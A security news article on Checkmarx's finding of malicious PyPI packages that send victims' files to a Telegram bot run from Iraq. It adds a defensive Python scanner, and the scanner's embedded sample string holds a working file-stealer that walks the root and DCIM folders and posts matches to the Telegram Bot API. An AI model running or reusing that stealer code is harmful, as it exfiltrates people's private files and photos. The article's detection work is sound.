Researchers at Checkmarx have traced a set of malicious PyPI packages to a Telegram bot that has been active since 2022 and whose chat history holds more than 90,000 messages, most of them in Arabic. The bot turns out to be the hub of a larger criminal ecosystem based in Iraq: an underground marketplace selling social-media manipulation services and tools for financial theft, alongside the PyPI packages that steal user data.
The packages appeared on PyPI, the Python package index, under the uploader alias “dsfsdfds,” with Arabic-language content. When the Checkmarx team examined them, they found that each carried a malicious script that collects sensitive files from the victim's machine and sends them to a Telegram bot chat.
“The malicious script kicks off by scanning the user’s file system, with a specific focus on two key locations: the root folder and the DCIM folder,” stated the report released by Checkmarx. “Throughout this scanning process, the script hunts for files with extensions such as .py, .php, and .zip, in addition to photos with .png, .jpg, and .jpeg extensions.”
The packages also embedded a hardcoded Telegram chat ID and bot token. Because the Bot API authenticates with nothing more than that token, the credentials gave the Checkmarx researchers direct access to the attacker's bot, and the bot's history showed activity going back to at least 2022, well before the packages were published on PyPI.
That archive of roughly 90,000 messages, and its links to numerous other bots, points to Iraq as the operation's base and indicates a previously unreported cybercriminal network there offering a range of illegal services.
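The traits described above (a hardcoded Telegram bot token and chat ID, calls to the Telegram Bot API, and file-harvesting logic aimed at the DCIM folder and a fixed list of extensions) are easy to look for in an unpacked package before it is installed. The scanner below is an added example written for this article; it is neither Checkmarx's tooling nor the malware itself. The regular expressions encode assumptions about how such code typically looks (for instance, that a bot token has the shape `<numeric id>:<35-character secret>`), and the sample package contents are constructed for the demonstration with a fake token and chat ID.

```python
"""Flag Telegram-based exfiltration indicators in an unpacked Python package.

Added example, not Checkmarx's code or the malware. Regex shapes are assumptions.
"""
import re
import tempfile
from pathlib import Path

# Telegram bot tokens look like "<numeric bot id>:<35-character secret>" (assumed shape).
BOT_TOKEN_RE = re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b")
# The HTTP Bot API endpoint used to post stolen files.
API_URL_RE = re.compile(r"api\.telegram\.org/bot")
# A chat_id literal: the destination chat hardcoded next to the token.
CHAT_ID_RE = re.compile(r"chat_id\W{0,4}-?\d{6,}", re.IGNORECASE)
# File-harvesting traits: the DCIM photo folder and the extensions named in the report.
DCIM_RE = re.compile(r"\bDCIM\b")
HARVEST_EXT_RE = re.compile(r"""['"]\.(?:py|php|zip|png|jpe?g)['"]""")

INDICATORS = [
    ("telegram_bot_token", BOT_TOKEN_RE),
    ("telegram_api_url", API_URL_RE),
    ("telegram_chat_id", CHAT_ID_RE),
    ("dcim_path", DCIM_RE),
    ("harvest_extension", HARVEST_EXT_RE),
]

# Files worth reading inside an sdist or wheel (setup.py, package modules, metadata).
SOURCE_SUFFIXES = {".py", ".pyw", ".cfg", ".toml", ".txt", ".ini"}


def scan_source(text, path="<string>"):
    """Return (path, line_no, indicator, line) for every indicator hit in one file."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.append((path, line_no, name, line.strip()))
    return hits


def scan_tree(root):
    """Scan every source-like file under root (e.g. an unpacked sdist or wheel)."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in SOURCE_SUFFIXES:
            try:
                text = p.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            hits.extend(scan_source(text, str(p.relative_to(root))))
    return hits


def risk_level(hits):
    """A bot token alone is suspect; a token plus harvesting logic matches the stealer pattern."""
    kinds = {h[2] for h in hits}
    if "telegram_bot_token" in kinds and kinds & {"dcim_path", "harvest_extension"}:
        return "high"
    if kinds & {"telegram_bot_token", "telegram_api_url", "telegram_chat_id"}:
        return "medium"
    return "low"


# Constructed sample mimicking the described stealer; the token and chat ID are fake.
SAMPLE_MALICIOUS = '''
import os, requests
TOKEN = "1234567890:AAFakeTokenForTheExample00000000000"
CHAT_ID = "-1001234567890"
for base in ("/", "/sdcard/DCIM"):
    for root, _, files in os.walk(base):
        for f in files:
            if f.endswith((".py", ".php", ".zip", ".png", ".jpg", ".jpeg")):
                requests.post(f"https://api.telegram.org/bot{TOKEN}/sendDocument",
                              data={"chat_id": CHAT_ID}, files={"document": open(os.path.join(root, f), "rb")})
'''

# Constructed benign module: ordinary HTTP use must not trigger the rules.
SAMPLE_BENIGN = '''
import requests
def fetch(url):
    return requests.get(url, timeout=5).text
'''


def demo():
    """Write both samples into a temporary package tree, scan it, and return (hits, risk)."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp) / "suspect_pkg"
        pkg.mkdir()
        (pkg / "__init__.py").write_text(SAMPLE_MALICIOUS, encoding="utf-8")
        (pkg / "util.py").write_text(SAMPLE_BENIGN, encoding="utf-8")
        hits = scan_tree(tmp)
    return hits, risk_level(hits)


if __name__ == "__main__":
    found, level = demo()
    for path, line_no, name, line in found:
        print(f"{path}:{line_no} [{name}] {line}")
    print("risk:", level)
```

Run it against a directory produced by `pip download --no-deps <pkg>` followed by unpacking the archive, not against an installed package, so that nothing in setup.py executes first. The extension rule is deliberately weak on its own (plenty of legitimate setup scripts mention `.py`), which is why `risk_level` only escalates to "high" when a bot token appears together with harvesting logic.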
“The exposure of the nefarious Python packages on PyPI and the subsequent probe into the Telegram bot have illuminated a sophisticated and widespread cybercriminal endeavor,” concluded the report. “What initially seemed to be an isolated occurrence of malicious packages turned out to be merely the tip of the iceberg, unveiling a well-established criminal ecosystem based in Iraq.”
The researchers note that the case shows once more how open-source package registries remain an attack path into enterprise data, and they say they will publish further details on the Iraqi underground in the coming months.
“As the battle against malicious actors in the open-source realm persists, cooperation and sharing of information among the security community will be vital in identifying and thwarting these attacks,” emphasized the researchers. “Through collective efforts and proactive measures, we can strive towards a safer and more secure open-source environment for all.”
The discovery illustrates how far such operations can extend from a single handful of malicious packages, and why defenders need to keep scrutinising what they pull from public registries and to share what they find.